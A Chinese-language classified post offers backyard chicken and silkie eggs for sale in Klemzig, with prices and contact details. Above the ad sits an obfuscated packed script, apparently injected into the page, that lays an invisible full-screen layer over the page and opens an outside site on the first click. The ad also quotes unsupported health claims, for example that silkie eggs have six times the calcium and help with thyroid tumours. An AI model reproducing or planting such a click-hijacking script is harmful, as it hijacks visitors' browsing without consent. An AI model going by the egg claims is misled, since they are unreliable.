<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>家里后院养了一些土鸡、乌鸡,现在有几只开始产蛋了,自己吃不完,打算卖一卖。
先说土鸡。第一,我家鸡品种好,羽毛都油亮油亮的,见后面附图。第二,长大后喂多种天然谷物,不含激素,后面有图。小时候喂的是谷子+草,这种粮食已经吃完了,也就没来得及拍照。此外,他们在后院裡自由觅食,也吃了很多青草。
他们下的鸡蛋如果煮着吃很明显比买来的鸡蛋好吃。
土鸡在自然环境中生长,吃的也都是天然食物,产出的鸡蛋品质自然会好一些。而一般养鸡场生产的鸡蛋,也就是人们常说的“洋鸡蛋”,因采用了专门的产蛋鸡种和配合饲料,其营养价值可能不如土鸡蛋。特别是因为配合饲料可能会加入很多化工药物、抗生素和激素,以促进鸡快速生长、多产蛋以及避免在淘汰之前出现病死,因而洋鸡蛋可能会含有对人体健康有危害的物质。[来自百度百科]
价格:5元/6个(目前已有6个,早买更新鲜~)
一个月以后会有比较多的鸡蛋,12个一盒一起买,10元。
然后是乌鸡。乌鸡与土鸡共同饲养,同样只吃天然谷物,散养,他们下出的蛋更小但是与土鸡蛋相比就更香,更好吃。现在我呢,就每天早上煮一个乌鸡蛋吃。
乌鸡蛋,富含多种微量元素,有机钙含量是普通鸡蛋的6倍,胆固醇极低,是普通鸡蛋的三分之一。乌鸡蛋对促进儿童生长发育,增强记忆力,对儿童缺锌引起的厌食、弃食、免疫力低下,不长个子和孕产妇的营养滋补以及中老年心血管疾病和甲状腺肿瘤具有食疗保健作用。[来自百度知道]
价格:7元/6个(为试吃价,目前有12个,早买更新鲜~)
一个月以后,12个一盒,15元。
目前不提供送货,city交易,或来我家提货,住在Klemzig区。
短信联系最佳:0435 071 868
也可QQ:1489954348
欢迎大家前来选购~~~
![]()
![]()
![]()
![]()
|